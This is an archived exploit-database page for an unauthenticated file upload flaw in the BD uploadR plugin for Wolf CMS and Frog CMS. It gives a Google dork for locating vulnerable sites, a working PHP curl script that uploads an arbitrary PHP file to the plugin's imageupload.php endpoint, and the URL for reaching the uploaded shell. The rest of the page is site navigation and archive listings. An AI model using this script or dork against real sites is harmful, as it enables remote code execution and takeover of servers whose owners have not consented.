Wolf CMS / Frog CMS BD uploadR Shell Upload

Wolf CMS / Frog CMS BD uploadR Shell Upload: Posted Jun 23, 2012; Authored by Sammy FORGIT; Wolf CMS / Frog CMS BD uploadR third party module suffers from an unauthenticated remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 7862b280d447ca7cc95905170c85512b0e3708ccdf66616a1a377cdd51241072; Download | Favorite | View

Wolf CMS / Frog CMS BD uploadR Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wolf CMS and Frog CMS Plugins - BD uploadR Arbitrary File Upload Vulnerability
# Version : no info
# link : http://www.vanderkleijn.net/frog-cms/plugins/bd-plugins.html
# Software : http://www.vanderkleijn.net/public/downloads/plugins/bdplugins/BD_uploadR.zip
# Date : 19-06-2012
# Google Dork : inurl:/frog/plugins/uploadR or inurl:/wolf/plugins/uploadR
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.exemple.com/frog/plugins/uploadR/imageupload.php?dirname=./uploads");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('1'=>"@$uploadfile",
                      'id'=>'1'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/frog/plugins/uploadR/uploads/lo.php

lo.php
<?php
phpinfo();
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 276 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 5 files
kai6u 3 files
Adam Gowdiak 3 files
liquidsky 3 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

Wolf CMS / Frog CMS BD uploadR Shell Upload

Wolf CMS / Frog CMS BD uploadR Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Wolf CMS / Frog CMS BD uploadR Shell Upload

Share This

Wolf CMS / Frog CMS BD uploadR Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems